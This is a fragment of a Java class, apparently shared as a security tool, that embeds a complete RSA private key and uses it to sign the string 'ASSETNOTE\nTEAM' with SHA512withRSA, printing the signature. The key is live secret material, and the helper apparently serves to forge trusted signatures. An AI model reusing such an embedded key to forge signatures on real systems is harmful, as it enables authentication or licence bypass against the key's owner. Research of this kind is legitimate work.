    static public String pkeyS = "MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQCkrT8rnZrnjKYzruZG5eswBmR70+vsNpz2Q1N2wBwlUcptzz+5mQ4usamFS6DQpfKGhOhoaMtd+c+rwsFj/lkMeoKJ+cP1zxN0ED/lGcwSNE7GSpm/G3sdQHVBoVVTuALhFklQj+Vrr/ebiHKi6InAdWhHGH8yteqI9BzL7YjHrrL3oCoLWh+M8RokNOSe5/ID7/WRDfJ+TPAWS4Ba+A/lOxWhXJiclM7Masc0jXz0M3YtkfePuKo+/THuV2/UFC/WwwECf/0qs1fJFLYiOJVIFIxc1ZQuRRhzJOmb7gDmSsaX0vozMS8bJfFhf2mXYX9K+H4cioDK8ZonqxseTnndAgMBAAECggEBAI321MiS/CG1vOo9U0O3nkMun52omnBuvG4IqIFtKFZ75lk4G6Wy7ukOPCgvhJmbFjMljP3FqdyAKanXIcVEVhxN2Q99hJP6Srj58TteO/FNqsODOHvqAv66vNsxbE/aCJFnFxkelBd8AafRv5H1ihuim5z+31kmPuSGHfUn94y8CgmSrIkd9CWcbZElkFskGYdYUAI34TFcYNBkurvH55eFrlJa8qq/2i6Ym75JkONG9ahctscz5khp2PW+KtLl9CtQobZyAlmkVpfr+o+Jl94SisM2D4VWU3CSo2i/HKIlrfKYjYxyMnNSgUF9WSwpHsuTcJswpVyRmet+pguEC0ECgYEA2FxiDC96URd46noYlCyzcbYLiMPGucLf6laAA1ps3P57NLOLkldbXIIfl8Ya9GajLuYkADHkrZm0fyWEH4VaWATdnEz70Eym5H5NLJ4kbYWvhZnTTAURH0vNOQQyojcFD7By2+9n1Usu0vN0k7tokPI2+CSdHtOFXK+kUKc878kCgYEAwtjO96mRP7+NCHsuWbRd27xqmpdSbNya0oaYjaEK7N7p+Tva4S4PE3zgLS4QKDxB8vLZh7zlsmf31FyuJ+TgCSGKa/Q4Kpp32vRHCoT+Sm7f+r8N1TxqbMZr1ddmqut4t2tK6W+xwfeZbjbOGNmK2Oub4wtOSHNhlvjOzmgNS3UCgYEA0IbZiN0JiraQt4zNu6IJoQLPwxTNp6QGo5iS8KhqW+R5YqXZU0YWq+ZOBL3OpNd3V3BAKl/sAtUtfY3u9WJVXJfz7vzThkMaZwbD4sjYWyaJsL49Q/tuMTehp94/3tAgdKqfSRJIhO5dRruWE/yAH5MTH75KILfExTwTphhJRuECgYEAhQG9HqDY7vxSSMTVmhSesX4IA2lisb9RzH5mqt+Q9qsgaqsqOebYEcR/vzeffefMWQzf42HWJpgEPCncFI2PRYxo0lKO+L4jLQrtZ8frUmIncSJ0TeiE+aXlPL9ibTB6YjLSm1FMtYzQZsTwoVP3DSagbjdsg9aHeqhze8DZunUCgYBst5P8k/h2FWqBpq1+gununsPrCVwVSZG/DqKAlMO08Y/ikmDIB5sCtcMgDkky4rqf7dAcV0TeXki3hVQI0ri1WebFKFerKy4N/43+FMdTWo9o/umL+7ZZGmPbYYX97XtdLekRqWO3uUzsw6xCC9fWoCCZ6H2uVIFEMpuHWkYj/A==";
    private static KeyFactory B;

    public static PrivateKey getPrivate(final byte[] encodedKey) throws InvalidKeySpecException {
        return GenSig.B.generatePrivate(new PKCS8EncodedKeySpec(encodedKey));
    }
    public static void main(String[] args) throws NoSuchAlgorithmException, InvalidKeySpecException, InvalidKeyException, SignatureException {
        GenSig.B = KeyFactory.getInstance("RSA");
        String txt = "ASSETNOTE\nTEAM";
        PrivateKey pew = GenSig.getPrivate(Base64.getDecoder().decode(pkeyS));
        final byte[] bytes = txt.getBytes(StandardCharsets.UTF_8);
        final Signature instance = Signature.getInstance("SHA512withRSA");
        instance.initSign(pew);
        instance.update(bytes);
        String out = new String(Base64.getEncoder().encode(instance.sign()));
        System.out.println(out);
    }

}

 

标签:工具分享